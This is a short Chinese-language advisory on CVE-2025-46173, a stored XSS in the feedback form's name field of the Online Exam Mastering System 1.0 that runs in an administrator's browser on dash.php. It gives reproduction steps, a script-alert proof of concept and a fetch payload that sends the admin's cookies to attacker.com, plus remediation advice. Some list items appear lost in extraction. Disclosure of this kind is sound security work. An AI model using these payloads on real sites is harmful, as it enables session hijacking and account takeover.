CVE-2025-46173 是 code-projects 开发的 Online Exam Mastering System 1.0 中存在的一个存储型跨站脚本(XSS)漏洞。该漏洞存在于 feedback.php 组件中,用户在姓名字段中的输入未经过适当的净化处理,恶意攻击者可借此注入任意 JavaScript。当管理员在管理后台(dash.php)查看该反馈时,载荷会在管理员的浏览器中执行,从而导致会话劫持和潜在的权限提升。
feedback.php、dash.php用户在反馈表单的姓名字段中提交以下载荷:
<script>alert(document.cookie)</script>

当管理员随后在 dash.php 中查看提交的反馈时,载荷将执行:

管理员的会话 Cookie 通过 document.cookie 被暴露,可被窃取:
<script>
fetch("http://attacker.com/steal?cookie=" + document.cookie);
</script>
从 code-projects 克隆或搭建存在漏洞的版本。
访问 localhost/exam/feedback.php。
在"姓名"字段中填入:
<script>alert(document.cookie)</script>
提交表单。
以管理员身份登录并访问 dash.php?q=3 查看反馈。
该脚本将在管理员的上下文中执行。
成功利用该漏洞可使远程攻击者:
&、<、>、")进行转义。htmlspecialchars(),或采用前端验证 + 后端净化的组合方案。Pruthu Raut LinkedIn | TryHackMe Top 2% | GitHub
截图仅供教育用途。所有测试均在本地环境中完成。
此信息仅供教育和研究目的使用。请勿将其用于您不拥有或未经明确许可测试的系统。